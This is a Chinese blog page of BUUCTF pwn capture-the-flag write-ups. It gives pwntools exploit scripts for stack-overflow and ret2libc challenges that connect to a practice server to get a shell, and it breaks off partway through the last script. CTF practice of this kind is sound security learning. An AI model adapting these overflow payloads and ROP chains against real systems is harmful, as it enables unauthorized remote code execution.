<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.3.0">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/ac1.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="//cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.15.1/css/all.min.css">
  <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/animate.css@3.1.1/animate.min.css">

<script class="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"fallsilkworms.github.io","root":"/","images":"/images","scheme":"Muse","version":"8.2.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12},"copycode":false,"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"prism":false,"i18n":{"placeholder":"搜索...","empty":"没有找到任何搜索结果：${query}","hits_time":"找到 ${hits} 个搜索结果（用时 ${time} 毫秒）","hits":"找到 ${hits} 个搜索结果"}};
  </script>
<meta name="description" content="buurip知识补充：pwn远程的时候遇到 timeout: the monitored command dumped core 怎么办_ 照例一波  啥也没开，直接IDA  有&#x2F;bin&#x2F;sh，记录覆盖地址，接着跟进main  栈溢出  15+8&#x3D;23 exp 12345from pwn import *p&#x3D;remote(&quot;node4.buuoj.cn&quot;,25720)paylo">
<meta property="og:type" content="article">
<meta property="og:title" content="Buuctf pwn">
<meta property="og:url" content="http://fallsilkworms.github.io/2021/11/05/Buuctf-pwn/index.html">
<meta property="og:site_name" content="fallsilkworm&#39;s Blog">
<meta property="og:description" content="buurip知识补充：pwn远程的时候遇到 timeout: the monitored command dumped core 怎么办_ 照例一波  啥也没开，直接IDA  有&#x2F;bin&#x2F;sh，记录覆盖地址，接着跟进main  栈溢出  15+8&#x3D;23 exp 12345from pwn import *p&#x3D;remote(&quot;node4.buuoj.cn&quot;,25720)paylo">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://fallsilkworms.github.io/2021/11/05/Buuctf-pwn/image-20210810163325029.png">
<meta property="og:image" content="http://fallsilkworms.github.io/2021/11/05/Buuctf-pwn/image-20210810163356348.png">
<meta property="og:image" content="http://fallsilkworms.github.io/2021/11/05/Buuctf-pwn/image-20210810163422612.png">
<meta property="og:image" content="http://fallsilkworms.github.io/2021/11/05/Buuctf-pwn/image-20210810163445944.png">
<meta property="og:image" content="http://fallsilkworms.github.io/2021/11/05/Buuctf-pwn/image-20210810170430280.png">
<meta property="og:image" content="http://fallsilkworms.github.io/2021/11/05/Buuctf-pwn/image-20210810170459054.png">
<meta property="og:image" content="http://fallsilkworms.github.io/2021/11/05/Buuctf-pwn/image-20210810170529733.png">
<meta property="og:image" content="http://fallsilkworms.github.io/2021/11/05/Buuctf-pwn/image-20210810170538184.png">
<meta property="og:image" content="http://fallsilkworms.github.io/2021/11/05/Buuctf-pwn/image-20210810170857375.png">
<meta property="og:image" content="http://fallsilkworms.github.io/2021/11/05/Buuctf-pwn/image-20210810171117509.png">
<meta property="og:image" content="http://fallsilkworms.github.io/2021/11/05/Buuctf-pwn/image-20210810173707633.png">
<meta property="og:image" content="http://fallsilkworms.github.io/2021/11/05/Buuctf-pwn/image-20210810173741252.png">
<meta property="og:image" content="http://fallsilkworms.github.io/2021/11/05/Buuctf-pwn/image-20210810173814473.png">
<meta property="og:image" content="http://fallsilkworms.github.io/2021/11/05/Buuctf-pwn/image-20210810173821370.png">
<meta property="og:image" content="http://fallsilkworms.github.io/2021/11/05/Buuctf-pwn/image-20210810174622785.png">
<meta property="og:image" content="http://fallsilkworms.github.io/2021/11/05/Buuctf-pwn/image-20210810223418346.png">
<meta property="og:image" content="http://fallsilkworms.github.io/2021/11/05/Buuctf-pwn/image-20210811013323435.png">
<meta property="og:image" content="http://fallsilkworms.github.io/2021/11/05/Buuctf-pwn/image-20210811013105693.png">
<meta property="og:image" content="http://fallsilkworms.github.io/2021/11/05/Buuctf-pwn/image-20210814215923374.png">
<meta property="og:image" content="http://fallsilkworms.github.io/2021/11/05/Buuctf-pwn/image-20210814233352397.png">
<meta property="og:image" content="http://fallsilkworms.github.io/2021/11/05/Buuctf-pwn/image-20210814233419966.png">
<meta property="og:image" content="http://fallsilkworms.github.io/2021/11/05/Buuctf-pwn/image-20210814234919460.png">
<meta property="og:image" content="http://fallsilkworms.github.io/2021/11/05/Buuctf-pwn/image-20210814233857309.png">
<meta property="og:image" content="http://fallsilkworms.github.io/2021/11/05/Buuctf-pwn/image-20210814234658247.png">
<meta property="og:image" content="http://fallsilkworms.github.io/2021/11/05/Buuctf-pwn/image-20210814235141594.png">
<meta property="og:image" content="http://fallsilkworms.github.io/2021/11/05/Buuctf-pwn/image-20210815225707104.png">
<meta property="og:image" content="http://fallsilkworms.github.io/2021/11/05/Buuctf-pwn/image-20210815225729946.png">
<meta property="og:image" content="http://fallsilkworms.github.io/2021/11/05/Buuctf-pwn/image-20210815230104471.png">
<meta property="og:image" content="http://fallsilkworms.github.io/2021/11/05/Buuctf-pwn/image-20210815230158791.png">
<meta property="og:image" content="http://fallsilkworms.github.io/2021/11/05/Buuctf-pwn/image-20211020203126501.png">
<meta property="og:image" content="http://fallsilkworms.github.io/2021/11/05/Buuctf-pwn/image-20211021151827895.png">
<meta property="og:image" content="http://fallsilkworms.github.io/2021/11/05/Buuctf-pwn/image-20211021152138878.png">
<meta property="og:image" content="http://fallsilkworms.github.io/2021/11/05/Buuctf-pwn/pwn学习记录/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L21jbXV5YW5nYQ==,size_16,color_FFFFFF,t_70%23pic_center.png">
<meta property="og:image" content="http://fallsilkworms.github.io/2021/11/05/Buuctf-pwn/image-20211023212427788.png">
<meta property="og:image" content="http://fallsilkworms.github.io/2021/11/05/Buuctf-pwn/image-20211023213232716.png">
<meta property="og:image" content="http://fallsilkworms.github.io/2021/11/05/Buuctf-pwn/image-20211023213057682.png">
<meta property="og:image" content="http://fallsilkworms.github.io/2021/11/05/Buuctf-pwn/image-20211023212746980.png">
<meta property="og:image" content="http://fallsilkworms.github.io/2021/11/05/Buuctf-pwn/image-20211023212505052.png">
<meta property="og:image" content="http://fallsilkworms.github.io/2021/11/05/Buuctf-pwn/image-20211023212853269.png">
<meta property="og:image" content="http://fallsilkworms.github.io/2021/11/05/Buuctf-pwn/image-20211026173858837.png">
<meta property="og:image" content="http://fallsilkworms.github.io/2021/11/05/Buuctf-pwn/image-20211026174310934.png">
<meta property="og:image" content="http://fallsilkworms.github.io/2021/11/05/Buuctf-pwn/image-20211026175946526.png">
<meta property="og:image" content="http://fallsilkworms.github.io/2021/11/05/Buuctf-pwn/image-20211026174359554.png">
<meta property="og:image" content="http://fallsilkworms.github.io/2021/11/05/Buuctf-pwn/image-20211026183855261.png">
<meta property="og:image" content="http://fallsilkworms.github.io/2021/11/05/Buuctf-pwn/image-20211026183908484.png">
<meta property="og:image" content="http://fallsilkworms.github.io/2021/11/05/Buuctf-pwn/image-20211026183942799.png">
<meta property="og:image" content="http://fallsilkworms.github.io/2021/11/05/Buuctf-pwn/image-20211027201100380.png">
<meta property="og:image" content="http://fallsilkworms.github.io/2021/11/05/Buuctf-pwn/image-20211027201155997.png">
<meta property="og:image" content="http://fallsilkworms.github.io/2021/11/05/Buuctf-pwn/image-20211101203620034.png">
<meta property="og:image" content="http://fallsilkworms.github.io/2021/11/05/Buuctf-pwn/image-20211101203803396.png">
<meta property="og:image" content="http://fallsilkworms.github.io/2021/11/05/Buuctf-pwn/image-20211101203707855.png">
<meta property="og:image" content="http://fallsilkworms.github.io/2021/11/05/Buuctf-pwn/image-20211101204410194.png">
<meta property="og:image" content="http://fallsilkworms.github.io/2021/11/05/Buuctf-pwn/image-20211102150836424.png">
<meta property="og:image" content="http://fallsilkworms.github.io/2021/11/05/Buuctf-pwn/image-20211102150912458.png">
<meta property="article:published_time" content="2021-11-05T07:34:46.000Z">
<meta property="article:modified_time" content="2021-11-05T07:35:05.525Z">
<meta property="article:author" content="YX">
<meta property="article:tag" content="Pwn刷题">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://fallsilkworms.github.io/2021/11/05/Buuctf-pwn/image-20210810163325029.png">


<link rel="canonical" href="http://fallsilkworms.github.io/2021/11/05/Buuctf-pwn/">


<script class="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>
<title>Buuctf pwn | fallsilkworm's Blog</title>
  




  <noscript>
  <style>
  body { margin-top: 2rem; }

  .use-motion .menu-item,
  .use-motion .sidebar,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header {
    visibility: visible;
  }

  .use-motion .header,
  .use-motion .site-brand-container .toggle,
  .use-motion .footer { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle,
  .use-motion .custom-logo-image {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line {
    transform: scaleX(1);
  }

  .search-pop-overlay, .sidebar-nav { display: none; }
  .sidebar-panel { display: block; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <h1 class="site-title">fallsilkworm's Blog</h1>
      <i class="logo-line"></i>
    </a>
      <p class="site-subtitle" itemprop="description">一只千年秋蚕</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu">
        <li class="menu-item menu-item-home"><a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a></li>
        <li class="menu-item menu-item-about"><a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a></li>
        <li class="menu-item menu-item-tags"><a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a></li>
        <li class="menu-item menu-item-categories"><a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a></li>
        <li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a></li>
  </ul>
</nav>




</div>
        
  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>

  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#buu"><span class="nav-number">1.</span> <span class="nav-text">buu</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#rip"><span class="nav-number">1.1.</span> <span class="nav-text">rip</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#csaw2016"><span class="nav-number">1.2.</span> <span class="nav-text">csaw2016</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#ciscn2019"><span class="nav-number">1.3.</span> <span class="nav-text">ciscn2019</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#sctf2016"><span class="nav-number">1.4.</span> <span class="nav-text">sctf2016</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#ciscn2019-c-1"><span class="nav-number">1.5.</span> <span class="nav-text">ciscn2019_c_1</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#PWN5"><span class="nav-number">1.6.</span> <span class="nav-text">PWN5</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#babyrop"><span class="nav-number">1.7.</span> <span class="nav-text">babyrop</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#ciscn2019n8"><span class="nav-number">1.8.</span> <span class="nav-text">ciscn2019n8</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#level2"><span class="nav-number">1.9.</span> <span class="nav-text">level2</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#get-started-3dsctf-2016"><span class="nav-number">1.10.</span> <span class="nav-text">get_started_3dsctf_2016</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#not-the-same-3dsctf-2016"><span class="nav-number">1.11.</span> <span class="nav-text">not_the_same_3dsctf_2016</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#ciscn-2019-n-5"><span class="nav-number">1.12.</span> <span class="nav-text">ciscn_2019_n_5</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#others-shellcode"><span class="nav-number">1.13.</span> <span class="nav-text">others_shellcode</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#ciscn-2019-ne-5"><span class="nav-number">1.14.</span> <span class="nav-text">ciscn_2019_ne_5</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#bjdctf-2020-babyrop"><span class="nav-number">1.15.</span> <span class="nav-text">bjdctf_2020_babyrop</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#pwn2-sctf-2016"><span class="nav-number">1.16.</span> <span class="nav-text">pwn2_sctf_2016</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#jarvisoj-fm"><span class="nav-number">1.17.</span> <span class="nav-text">jarvisoj_fm</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#bjdctf-2020-babystack2"><span class="nav-number">1.18.</span> <span class="nav-text">bjdctf_2020_babystack2</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#baby-rop2"><span class="nav-number">1.19.</span> <span class="nav-text">baby_rop2</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#ciscn-2019-es-2"><span class="nav-number">1.20.</span> <span class="nav-text">ciscn_2019_es_2</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#jarvisoj-tell-me-something"><span class="nav-number">1.21.</span> <span class="nav-text">jarvisoj_tell_me_something</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#ez-pz-hackover-2016"><span class="nav-number">1.22.</span> <span class="nav-text">ez_pz_hackover_2016</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#ctfhub"><span class="nav-number">2.</span> <span class="nav-text">ctfhub</span></a></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author site-overview-item animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="YX"
      src="/images/avatar.gif">
  <p class="site-author-name" itemprop="name">YX</p>
  <div class="site-description" itemprop="description">等一场秋风再起，花开如绎</div>
</div>
<div class="site-state-wrap site-overview-item animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">10</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">2</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">3</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>



        </div>
      </div>
    </div>
  </aside>
  <div class="sidebar-dimmer"></div>


    </header>

    
  <div class="back-to-top" role="button">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>
  <div class="reading-progress-bar"></div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://fallsilkworms.github.io/2021/11/05/Buuctf-pwn/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="YX">
      <meta itemprop="description" content="等一场秋风再起，花开如绎">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="fallsilkworm's Blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          Buuctf pwn
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">发表于</span>
      

      <time title="创建时间：2021-11-05 15:34:46 / 修改时间：15:35:05" itemprop="dateCreated datePublished" datetime="2021-11-05T15:34:46+08:00">2021-11-05</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-folder"></i>
      </span>
      <span class="post-meta-item-text">分类于</span>
        <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
          <a href="/categories/Bin/" itemprop="url" rel="index"><span itemprop="name">Bin</span></a>
        </span>
    </span>

  
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">
        <h2 id="buu"><a href="#buu" class="headerlink" title="buu"></a>buu</h2><h3 id="rip"><a href="#rip" class="headerlink" title="rip"></a>rip</h3><p>知识补充：<a target="_blank" rel="noopener" href="https://blog.csdn.net/CSDNiamcoming/article/details/118144234">pwn远程的时候遇到 timeout: the monitored command dumped core 怎么办_</a></p>
<p>照例一波</p>
<p><img src="/2021/11/05/Buuctf-pwn/image-20210810163325029.png" alt="image-20210810163325029"></p>
<p>啥也没开，直接IDA</p>
<p><img src="/2021/11/05/Buuctf-pwn/image-20210810163356348.png" alt="image-20210810163356348"></p>
<p>有/bin/sh，记录覆盖地址，接着跟进main</p>
<p><img src="/2021/11/05/Buuctf-pwn/image-20210810163422612.png" alt="image-20210810163422612"></p>
<p>栈溢出</p>
<p><img src="/2021/11/05/Buuctf-pwn/image-20210810163445944.png" alt="image-20210810163445944"></p>
<p>15+8=23</p>
<p>exp</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">p=remote(<span class="string">&quot;node4.buuoj.cn&quot;</span>,<span class="number">25720</span>)</span><br><span class="line">payload = <span class="string">b&#x27;a&#x27;</span>*<span class="number">23</span>+p64(<span class="number">0x401185</span>)+p64(<span class="number">0x401186</span>)</span><br><span class="line">p.sendline(payload)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
<h3 id="csaw2016"><a href="#csaw2016" class="headerlink" title="csaw2016"></a>csaw2016</h3><p>照例</p>
<p><img src="/2021/11/05/Buuctf-pwn/image-20210810170430280.png" alt="image-20210810170430280"></p>
<p>啥也没开估计也是栈溢出，IDA</p>
<p><img src="/2021/11/05/Buuctf-pwn/image-20210810170459054.png" alt="image-20210810170459054"></p>
<p>栈溢出</p>
<p><img src="/2021/11/05/Buuctf-pwn/image-20210810170529733.png" alt="image-20210810170529733"></p>
<p><img src="/2021/11/05/Buuctf-pwn/image-20210810170538184.png" alt="image-20210810170538184"></p>
<p>40+8=48</p>
<p>接下来没发现/bin/sh，但是有这个</p>
<p><img src="/2021/11/05/Buuctf-pwn/image-20210810170857375.png" alt="image-20210810170857375"></p>
<p>同样可以返回它的地址拿shell，然后它找到压栈的地址</p>
<p><img src="/2021/11/05/Buuctf-pwn/image-20210810171117509.png" alt="image-20210810171117509"></p>
<p>exp</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">p=remote(<span class="string">&quot;node4.buuoj.cn&quot;</span>,<span class="number">29116</span>)</span><br><span class="line">sys=<span class="number">0x400611</span></span><br><span class="line">payload = <span class="string">&#x27;a&#x27;</span>*<span class="number">0x48</span>+p64(sys)</span><br><span class="line">p.sendline(payload)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
<h3 id="ciscn2019"><a href="#ciscn2019" class="headerlink" title="ciscn2019"></a>ciscn2019</h3><p>照例</p>
<p><img src="/2021/11/05/Buuctf-pwn/image-20210810173707633.png" alt="image-20210810173707633"></p>
<p>说值应该是11.28125，输了后也没啥事</p>
<p>IDA</p>
<p><img src="/2021/11/05/Buuctf-pwn/image-20210810173741252.png" alt="image-20210810173741252"></p>
<p>栈溢出，用v1的值覆盖v2</p>
<p><img src="/2021/11/05/Buuctf-pwn/image-20210810173814473.png" alt="image-20210810173814473"></p>
<p><img src="/2021/11/05/Buuctf-pwn/image-20210810173821370.png" alt="image-20210810173821370"></p>
<p>v1与v2之间为0x30-0x4，先填满，然后再直接打11.28125的地址就行了。因为返回的值为11.28125，在IDA里以十六进制储存。就是0x41348000</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">p=remote(<span class="string">&quot;node4.buuoj.cn&quot;</span>,<span class="number">25804</span>)</span><br><span class="line">sys=<span class="number">0x41348000</span></span><br><span class="line">payload = <span class="string">&#x27;a&#x27;</span>*(<span class="number">0x30</span>-<span class="number">0x4</span>)+p64(sys)</span><br><span class="line">p.sendline(payload)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
<h3 id="sctf2016"><a href="#sctf2016" class="headerlink" title="sctf2016"></a>sctf2016</h3><p>照例</p>
<p><img src="/2021/11/05/Buuctf-pwn/image-20210810174622785.png" alt="image-20210810174622785"></p>
<p>IDA</p>
<p><img src="/2021/11/05/Buuctf-pwn/image-20210810223418346.png" alt="image-20210810223418346"></p>
<p>虽然fgets那里有规定输入长度32，但是发现strcpy，存在栈溢出，不过大致看了一会儿并不会，看wp</p>
<p>得知这一串内容是让“you”代替“I”，意思是只要“you”的值覆盖掉输入“I”的长度即可，而“you”是3个字符，满足32就用20个“I”然后就变成60个字符造成溢出，再然后加上最后的4</p>
<p><img src="/2021/11/05/Buuctf-pwn/image-20210811013323435.png" alt="image-20210811013323435"></p>
<p>接下来找到后门</p>
<p><img src="/2021/11/05/Buuctf-pwn/image-20210811013105693.png" alt="image-20210811013105693"></p>
<p>exp</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">p=remote(<span class="string">&quot;node4.buuoj.cn&quot;</span>,<span class="number">25454</span>)</span><br><span class="line">sys=<span class="number">0x08048f0d</span></span><br><span class="line">payload = <span class="string">b&#x27;I&#x27;</span>*<span class="number">20</span>+<span class="string">b&#x27;a&#x27;</span>*<span class="number">4</span>+p64(sys)</span><br><span class="line">p.sendline(payload)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
<h3 id="ciscn2019-c-1"><a href="#ciscn2019-c-1" class="headerlink" title="ciscn2019_c_1"></a>ciscn2019_c_1</h3><p>wp参考： <a target="_blank" rel="noopener" href="https://blog.csdn.net/mcmuyanga/article/details/108224907">BUUCTF——ciscn_2019_c_1_</a></p>
<p><a target="_blank" rel="noopener" href="http://liul14n.top/2020/01/29/ciscn-2019-c-1/">ciscn_2019_c_1 | LiuLian (liul14n.top)</a></p>
<p>照例</p>
<p><img src="/2021/11/05/Buuctf-pwn/image-20210814215923374.png" alt="image-20210814215923374"></p>
<p>IDA</p>
<p><img src="/2021/11/05/Buuctf-pwn/image-20210814233352397.png" alt="image-20210814233352397"></p>
<p>跟进encrypt</p>
<p><img src="/2021/11/05/Buuctf-pwn/image-20210814233419966.png" alt="image-20210814233419966"></p>
<p>gets里可以利用溢出，但是跟进不了v2是因为程序会对我们输入的字符串v2进行一系列异或操作。</p>
<p><img src="/2021/11/05/Buuctf-pwn/image-20210814234919460.png" alt="image-20210814234919460"></p>
<p>再看到下面的<code>++x;</code>，然后也可以推测出x的初始值为0。</p>
<p>这也就是说，只有当我们输入的字符串的长度大于x的值的时候，才会执行这一系列异或操作。</p>
<p>所以如果我们输入两次长度相等的字符串，那么只会对第一次输入的字符串进行异或。</p>
<p><img src="/2021/11/05/Buuctf-pwn/image-20210814233857309.png" alt="image-20210814233857309"></p>
<p>然后这题没有system，就是ret2libc的题型</p>
<p>由于是64位程序传参先找到rdi</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ROPgadget --binary ciscn2019c1 --only &quot;pop|ret&quot; | grep rdi</span><br></pre></td></tr></table></figure>
<p><img src="/2021/11/05/Buuctf-pwn/image-20210814234658247.png" alt="image-20210814234658247"></p>
<p>然后由于Ubuntu18运行机制与前面版本的不同，因此调用system需要栈对齐，这里填充ret来对齐</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ROPgadget --binary ciscn2019c1 |grep ret</span><br></pre></td></tr></table></figure>
<p><img src="/2021/11/05/Buuctf-pwn/image-20210814235141594.png" alt="image-20210814235141594"></p>
<p>exp</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> LibcSearcher <span class="keyword">import</span> LibcSearcher</span><br><span class="line"></span><br><span class="line">r=remote(<span class="string">&#x27;node4.buuoj.cn&#x27;</span>,<span class="number">25488</span>)</span><br><span class="line">elf=ELF(<span class="string">&#x27;./ciscn2019c1&#x27;</span>)</span><br><span class="line"></span><br><span class="line">rdi=<span class="number">0x400c83</span></span><br><span class="line">main = <span class="number">0x400b28</span></span><br><span class="line">ret=<span class="number">0x4006b9</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#输出的是plt和got表地址</span></span><br><span class="line">puts_plt=elf.plt[<span class="string">&#x27;puts&#x27;</span>]</span><br><span class="line">puts_got=elf.got[<span class="string">&#x27;puts&#x27;</span>]</span><br><span class="line"></span><br><span class="line"><span class="comment">#第一次payload输出puts_got的内容，我们得控制程序执行流</span></span><br><span class="line">r.sendlineafter(<span class="string">&#x27;choice!\n&#x27;</span>,<span class="string">&#x27;1&#x27;</span>)</span><br><span class="line">payload=<span class="string">&#x27;\0&#x27;</span>+<span class="string">&#x27;a&#x27;</span>*(<span class="number">0x50</span>-<span class="number">1</span>+<span class="number">8</span>)+p64(rdi)+p64(puts_got)+p64(puts_plt)+p64(main)<span class="comment">#让它返回到main函数，这样我们才可以再一次利用输入点构造rop </span></span><br><span class="line">r.sendlineafter(<span class="string">&#x27;encrypted\n&#x27;</span>,payload)</span><br><span class="line">r.recvline()</span><br><span class="line">r.recvline()</span><br><span class="line"></span><br><span class="line"><span class="comment">#接收程序返回的地址</span></span><br><span class="line">puts_addr=u64(r.recvuntil(<span class="string">&#x27;\n&#x27;</span>)[:-<span class="number">1</span>].ljust(<span class="number">8</span>,<span class="string">&#x27;\0&#x27;</span>))<span class="comment">#不满8位的用0补足</span></span><br><span class="line"><span class="built_in">print</span> <span class="built_in">hex</span>(puts_addr)</span><br><span class="line"></span><br><span class="line"><span class="comment">#构造rop</span></span><br><span class="line">libc=LibcSearcher(<span class="string">&#x27;puts&#x27;</span>,puts_addr)<span class="comment">#找到libc版本</span></span><br><span class="line">offset=puts_addr-libc.dump(<span class="string">&#x27;puts&#x27;</span>)<span class="comment">#算出偏移量</span></span><br><span class="line">binsh=offset+libc.dump(<span class="string">&#x27;str_bin_sh&#x27;</span>) <span 